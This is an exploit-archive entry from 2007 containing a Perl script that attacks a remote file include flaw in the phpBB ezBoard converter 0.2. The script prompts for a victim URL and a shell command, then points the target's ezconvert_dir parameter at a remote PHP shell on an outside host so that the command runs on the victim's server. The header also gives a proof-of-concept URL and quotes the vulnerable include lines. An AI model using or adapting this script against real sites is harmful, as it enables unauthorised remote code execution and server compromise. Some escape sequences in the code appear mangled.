[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBB ezBoard converter 0.2 (ezconvert_dir) Remote File Include Exploit
# Published : 2007-02-02
# Author : xoron
# Previous Title : dB Masters Curium CMS <= 1.03 (c_id) Remote SQL Injection Vulnerability
# Next Title : phpBB++ Build 100 (phpbb_root_path) Remote File Include Exploit
# (C) xoron
#
# [Name: ezConvert: phpBB ezBoard converter v0.2 (ezconvert_dir) Remote File Include Exploit]
#
# [Author: xoron]
# [Exploit coded by xoron]
#
# [Download: http://sourceforge.net/project/showfiles.php?group_id=114129]
#
# [xoron.biz - xoron.info]
#
# [www.xoron.info/bugs/ezconvert.txt]
#
# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]
#
# [Tesekkurler: chaos, pang0, DJR]
#
# [POC: /ezconvert/config.php?ezconvert_dir=http://evilscripts?
#
# [Vuln Codes: include ($ezconvert_dir . 'ezboard-parse.' . $phpEx);
# include ($ezconvert_dir . 'phpbb-insert.' . $phpEx);
#
#
$rfi = "config.php?ezconvert_dir=";
$path = "/ezconvert/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // TurkishnPlz Select Lang:n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) xoronn";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoronn";
&ex;
}
else {print "Plz Select Langugen"; exit;}
sub ex{
$not = "Victim is Not Vunl.n" and $not_cmd = "Victim is Vunl but Not doing Exec.n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yokn" and $not_cmd = "Adresde Acyk Var Fakat Kod Calismiyorn"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) xoron.info - xoron.bizn$thx: pang0, chaos, can bjornn";
sleep 3;
system("start $acacaz");
}
# www.Syue.com [2007-02-02]